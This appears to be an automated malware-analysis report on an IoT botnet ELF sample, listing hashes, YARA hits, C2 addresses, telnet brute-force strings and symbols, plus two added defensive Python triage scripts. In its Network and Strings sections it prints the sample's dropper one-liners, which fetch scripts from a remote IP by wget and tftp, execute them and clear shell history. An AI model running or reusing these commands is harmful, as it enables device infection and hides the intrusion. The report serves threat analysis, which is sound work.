Report #1590

Binary
ABI
ELFOSABI_SYSV
Size
98.52KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
74b4c9ff209fe609737c69b326ee7d46
sha1
da0acff001489d9b5a5cf1e6c63bd63ee922dd09
crc32
0xa1de1a24
sha224
b3902db5c3f072cb560521a32c3c13b55f94112797fb746693cd46dd
sha256
4e99b1006ed58305f2d0b222b3dd92032661fee310da503cd4adc0443dc31c76
sha384
f696e984cf95f4d47fc61247dc02fca4446e2adfac388670e4ab1cd778956a62e4ac945f8bd3ec80411a83f091e3b0ae
sha512
521bfda7e29fd098af4728054e6c59985b6527c4a06715a7b9649cd3c35fcbe3a0cf3b1f23da9444623f8ea8b84fd571b121b025e0ea691d4159115e384a50c0
ssdeep
3072:0SmbLirEq/nvisMz9KeopXmS0veewQ08N:0B9MKsMseopXmS0veewQ08N
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, is__elf, url, IP, contentis_base64, Misc_Suspicious_Strings

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc

Password

Suspicious
False
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
107.170.96.217, 107.170.96.217:777
Nameserver strings
nameserver 8.8.8.8, nameserver 8.8.4.4
URLs
http://107.170.96.217/scan.py, http://107.170.96.217/bin.sh, http://107.170.96.217/bins.sh, 107.170.96.217/bin.sh (busybox wget), 107.170.96.217/bins.sh (busybox wget), tftp1.sh and tftp2.sh (busybox tftp -g 107.170.96.217)
Embedded shell commands (the analyser lists these under IPs and URLs; kept verbatim, including the sample's own "bis.sh" typo and the argument-less "chmod 777")
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bin.sh;chmod 777;sh bin.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history
cd /tmp/;wget http://107.170.96.217/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://107.170.96.217/bin.sh;sh bin.sh;rm -rf bis.sh
cd %s;rm -rf scan.py
cd %s;python scan.py 376 B 119.93 lol
cd %s;python scan.py 376 B 91.98 2
cd %s;python scan.py 376 B 118.173 2
cd %s;python scan.py 376 B 91.99 2
cd %s;python scan.py 376 B 92.99 2
cd %s;python scan.py 376 B %s 2
User-Agents (embedded)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4, Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911, Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2, Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285, Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7, BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100, Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36, Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mails

Suspicious
True
Strings
List
cd /tmp/;wget http://107.170.96.217/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://107.170.96.217/bin.sh;sh bin.sh;rm -rf bis.sh
http://107.170.96.217/scan.py
tftp2.sh
BIN.sh
tftp1.sh
ftp1.sh
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bin.sh;chmod 777;sh bin.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history
107.170.96.217:777
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
nameserver 8.8.4.4
nameserver 8.8.8.8
%s %s HTTP/1.1
cd %s;python scan.py 376 B %s 2
[ REBIRTH ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s
[ REBIRTH ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s
[ REBIRTH ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s
cd %s;python scan.py 376 B 92.99 2
cd %s;python scan.py 376 B 91.99 2
cd %s;python scan.py 376 B 91.98 2
cd %s;rm -rf scan.py
[ REBIRTH ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s
[ REBIRTH ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s
cd %s;python scan.py 376 B 119.93 lol
cd %s;python scan.py 376 B 118.173 2
[ REBIRTH ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
/etc/resolv.conf
User-Agent: %s
[ CONNECTED ] IP: %s || Arch Type: %s || Endianness Type: %s]
pkill -9 %s;killall -9 %s;
Network is down
Machine is not on the network
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
No route to host
Host is down
107.170.96.217
Host: %s
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
been_there_done_that.3001
[Updating] [%s:%s]
SSH_Usernames
SSH_Passwords
been_there_done_that
_fwrite.c
open.c
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files
Link has been severed
Too many open files in system
No such device
Too many links
Object is remote
Connection reset by peer
pass
Is a named type file
pass
BINS_HOST_IP
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
rm -rf %s;
cd %s;wget %s;
Operation not permitted
sudo mkdir %s;
[PYTHON] Downloading Scanner.
[PYTHON] Installing Dependencies.
[PYTHON] Killing Python Scanning Process.
[PYTHON] Done with installation.
dnslookup.c
Too many users
__GI_execl
__dns_lookup
cunty*IoT*
__GI_fflush_unlocked
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
Bot_Killer_Binarys
__GI_execve
Mirai_Usernames
Telnet_Usernames
__register_frame_info_bases
/etc/hosts
Telnet_Passwords
Mirai_Passwords
_Jv_RegisterClasses
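The dropper one-liners in the Network and Strings sections carry the sample's staging logic: fetch from 107.170.96.217 over HTTP (wget) and TFTP, chmod 777, run the fetched script with sh, then wipe the shell history. The following Python is an added example, not code from the report's tooling or from the sample, that splits those strings into simple commands and pulls out the hosts, fetched URLs, TFTP files, executed scripts, staging directories and anti-forensic steps. DROPPER_STRINGS is copied from the strings above; the looks_like_dropper heuristic (remote fetch followed by execution of a fetched file) is an assumption about what a telnet-honeypot triage rule should key on, not something the report states.

```python
"""Extract IOCs and staging steps from Gafgyt-style dropper one-liners (added example)."""
import re
from dataclasses import dataclass, field

# Constructed input: the command strings the report lists under IPs, URLs and Strings.
DROPPER_STRINGS = [
    "cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;"
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 107.170.96.217/bin.sh;chmod 777;sh bin.sh;"
    "busybox tftp -g 107.170.96.217 -r tftp1.sh;chmod 777 *;sh tftp1.sh;"
    "busybox tftp -g 107.170.96.217 -r tftp2.sh;chmod 777 *;sh tftp2.sh;"
    "rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history",
    "cd /tmp/;wget http://107.170.96.217/bins.sh;sh bins.sh;rm -rf bins.sh;"
    "cd /tmp/;wget http://107.170.96.217/bin.sh;sh bin.sh;rm -rf bis.sh",
    "cd %s;python scan.py 376 B %s 2",
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")
TFTP_GET = re.compile(r"tftp\s+-g\s+(\S+)\s+-r\s+(\S+)")   # busybox tftp -g HOST -r FILE
WGET = re.compile(r"wget\s+(\S+)")
RUN_SH = re.compile(r"(?:^|\s)sh\s+(\S+)")                   # "sh bin.sh", not "rm -rf *sh"


@dataclass
class DropperIOCs:
    hosts: set = field(default_factory=set)
    http_urls: set = field(default_factory=set)
    tftp_files: set = field(default_factory=set)      # (host, filename)
    executed: list = field(default_factory=list)      # scripts run with sh, in order
    staging_dirs: set = field(default_factory=set)    # every "cd" target tried
    anti_forensics: list = field(default_factory=list)


def split_commands(one_liner):
    """Split a shell one-liner on ';' and '||' into individual simple commands."""
    return [c.strip() for c in re.split(r";|\|\|", one_liner) if c.strip()]


def extract_iocs(one_liners):
    iocs = DropperIOCs()
    for line in one_liners:
        for cmd in split_commands(line):
            iocs.hosts.update(IPV4.findall(cmd))
            m = WGET.search(cmd)
            if m:
                url = m.group(1)
                if not url.startswith("http"):
                    url = "http://" + url          # busybox wget takes a bare host/path
                iocs.http_urls.add(url)
            m = TFTP_GET.search(cmd)
            if m:
                iocs.tftp_files.add((m.group(1), m.group(2)))
            m = RUN_SH.search(cmd)
            if m and m.group(1).endswith(".sh"):
                iocs.executed.append(m.group(1))
            if cmd.startswith("cd "):
                iocs.staging_dirs.add(cmd[3:].rstrip("/") or "/")
            if cmd.startswith("history") or ".bash_history" in cmd:
                iocs.anti_forensics.append(cmd)
    return iocs


def looks_like_dropper(line):
    """Assumed honeypot-log heuristic: a remote fetch followed by execution of a fetched script."""
    fetched = bool(WGET.search(line) or TFTP_GET.search(line))
    executed = any(RUN_SH.search(c) for c in split_commands(line))
    return fetched and executed


if __name__ == "__main__":
    r = extract_iocs(DROPPER_STRINGS)
    print("hosts:", sorted(r.hosts))
    print("http:", sorted(r.http_urls))
    print("tftp:", sorted(r.tftp_files))
    print("executed:", r.executed)
    print("anti-forensics:", r.anti_forensics)
```

The "%s" placeholders survive as a staging directory because the scan.py strings are printf formats filled in at run time; the C2-supplied directory is not on the page, so the extractor does not guess it.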

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4420, printchar, prints, printi, print, ipState.5170, ipState.5272, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, access.c, chdir.c, close.c, fork.c, getdtablesize.c, getpid.c, getppid.c, getrlimit.c, kill.c, open.c, prctl.c, read.c, select.c, seteuid.c, setresuid.c, setreuid.c, setuid.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strcasestr.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, 
been_there_done_that.3001, sigaction.c, __restore_rt, __restore, libc/sysdeps/linux/i386/vfork.S, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, ioctl.c, munmap.c, nanosleep.c, sbrk.c, sigprocmask.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, __syscall_error.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, UpdateNameSrvs, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __socketcall, __GI___ctype_b, __GI_memchr, BINS7, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, BINS13, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, BIN, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, advance_telstate, __GI_tolower, BINS3, recv, connect, __encode_question, __GI___uClibc_fini, numpids, __encode_header, __GI_strncat, __pthread_mutex_lock, 
initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, memmove, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, errno, getegid, read_until_response, __GI_sbrk, SSH_Usernames, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, BINS2, wildString, __xpg_strerror_r, SendUDP, fcntl64, prctl, memcpy, TelnetScanner, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, FTP1, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, reset_telstate, BINS5, socket, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, BINS11, __GI_open, __GI_strchr, __searchdomain, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, SendSTD, BINS10, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, RandomPythonRange, strtol, __libc_lseek64, strnlen, rawmemchr, TFTP2, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, Payload, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, Mirai_Usernames, RemoveTempDirs, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, getBuild, __resolv_lock, kill, 
fputs_unlocked, __pthread_mutex_trylock, Bot_Killer_Binarys, BINS6, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, TFTP1, ntohl, __GI_fseek, __GI_setreuid, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, __GI_memmove, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, BINS1, signal, read, __decode_header, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, BINS8, strncpy, strcasecmp, htonl, sendto, Python_Temp_Directory, __C_ctype_toupper, __GI___C_ctype_b, Telnet_Passwords, __GI_gethostbyname_r, __GI_strncpy, MiraiIPRanges, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, Mirai_Passwords, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, getEndianness, ClearHistory, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, Busybox_Payload, fork, Python_File_Location, __stdio_rfill, strncat, setresuid, __GI_sleep, sigaction, __GI_gethostbyname, SendTCP, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, _pthread_cleanup_push_defer, index, processCmd, __sigismember, fopen, __bss_start, setreuid, __libc_open, get_telstate_host, memset, __GI_socket, main, MiraiScanner, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, inet_ntoa, getppid, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, seteuid, __get_hosts_byname_r, 
__stdio_init_mutex, __GI__exit, strcmp, advances2, __nameserver, data_start, __GI_sysconf, __h_errno_location, Telnet_Usernames, matchPrompt, SSH_Passwords, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, contains_success, sprintf, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __decode_answer, __GI_signal, stderr, fails, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __GI_setresuid, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, BINS_HOST_IP, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, access, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, _errno, atoi, successes, BINS9, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, PythonRanges, open, Temp_Directorys, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, BINS4, BINS12, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, __GI_inet_addr, __GI_seteuid, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, fcntl, setuid, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, close, __libc_connect, __GI_strlen, mainCommSock, pids, SendHTTP, strpbrk, _load_inttype, raise, useragents, free, sigprocmask
Number
756
Reason
None
Suspicious
False
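Most of the 756 symbols above are uClibc and crt noise: object-file names ending in .c or .S, __GI_* and __libc_* aliases, gcc local statics such as completed.2429. The sample's own functions (TelnetScanner, SendHTTP, UpdateNameSrvs, Bot_Killer_Binarys) are what a triage wants to see first. The following Python is an added example, not part of the report's tooling: it filters the toolchain names out and buckets what remains by the naming prefixes visible in this list. SYMBOLS is a constructed subset of the Symbols list, LIBC_EXPORTS is a hand-picked and deliberately incomplete set of common libc names, and the bucket prefixes (Send*, *Scanner, BINS*, *_Usernames) are assumptions drawn from this list only.

```python
"""Separate a sample's own functions from uClibc/crt symbols (added triage example)."""
import re

# Constructed subset of the report's Symbols list.
SYMBOLS = [
    "libc/sysdeps/linux/i386/crt1.S", "crtstuff.c", "__CTOR_LIST__", "completed.2429",
    "client.c", "printchar", "ipState.5170", "__GI_execve", "strcpy", "recvLine",
    "TelnetScanner", "SendHTTP", "SendUDP", "UpdateNameSrvs", "Bot_Killer_Binarys",
    "Mirai_Usernames", "getRandomPublicIP", "memcpy", "__uClibc_main", "main", "_start",
    "rand_cmwc", "useragents", "BINS_HOST_IP", "BINS7", "processCmd", "_GLOBAL_OFFSET_TABLE_",
    "MiraiScanner", "Telnet_Passwords", "Busybox_Payload",
]

# Hand-picked, intentionally incomplete; extend from the target libc's export list.
LIBC_EXPORTS = {
    "strcpy", "memcpy", "memset", "strlen", "socket", "connect", "send", "recv", "fork",
    "main", "_start", "_init", "_fini", "free", "malloc", "system", "sleep", "kill",
}


def is_toolchain_noise(name):
    """True for names that come from the C runtime or libc rather than the sample's sources."""
    if name.endswith((".c", ".S")):            # object-file names recorded in .symtab
        return True
    if name.startswith("_"):                    # __GI_*, __libc_*, _stdio_*, linker symbols
        return True
    if re.search(r"\.\d+$", name):              # gcc local statics: completed.2429, ipState.5170
        return True
    return name in LIBC_EXPORTS


def sample_functions(symbols):
    """Return the non-toolchain names, deduplicated, in symbol-table order."""
    seen, out = set(), []
    for s in symbols:
        if s and not is_toolchain_noise(s) and s not in seen:
            seen.add(s)
            out.append(s)
    return out


def group_by_capability(names):
    """Bucket names by the capability their prefix advertises (assumed from this list's conventions)."""
    buckets = {"scanner": [], "flood": [], "dropper": [], "credentials": [], "other": []}
    for n in names:
        low = n.lower()
        if "scan" in low or "telnet" in low and not n.endswith(("Usernames", "Passwords")):
            buckets["scanner"].append(n)
        elif n.startswith("Send") or "flood" in low:
            buckets["flood"].append(n)
        elif n.startswith(("BINS", "BIN", "TFTP", "FTP")) or "Payload" in n:
            buckets["dropper"].append(n)
        elif n.endswith(("Usernames", "Passwords")):
            buckets["credentials"].append(n)
        else:
            buckets["other"].append(n)
    return buckets


if __name__ == "__main__":
    for cap, names in group_by_capability(sample_functions(SYMBOLS)).items():
        print("%-12s %s" % (cap, ", ".join(names)))
```

On the full list the "other" bucket still holds utility code (recvLine, processCmd, rand_cmwc); the point of the filter is that the 750-odd libc names disappear, not that every remaining name is classified.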
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False
Segments
Number
3
Suspicious
False
Compilers
List
GCC: (GNU) 4.1.2 (the same .comment string repeated identically across all 163 identified entries)
Identified
163
Suspicious
True
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , c, , Q, , i.4420, , printchar, , prints, , printi, , print, , ipState.5170, , ipState.5272, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , access.c, , chdir.c, , close.c, , fork.c, , getdtablesize.c, , getpid.c, , getppid.c, , getrlimit.c, , kill.c, , open.c, , prctl.c, , read.c, , select.c, , seteuid.c, , setresuid.c, , setreuid.c, , setuid.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , sprintf.c, , vsnprintf.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fixed_buffers, , _wcommit.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_ranges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1330, , _string_syserrmsgs.c, , bcopy.c, , strcasestr.c, , strtok.c, , next_start.1278, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.c, , gethostbyname.c, , buf.5162, , h.5161, , gethostbyname_r.c, , connect.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , 
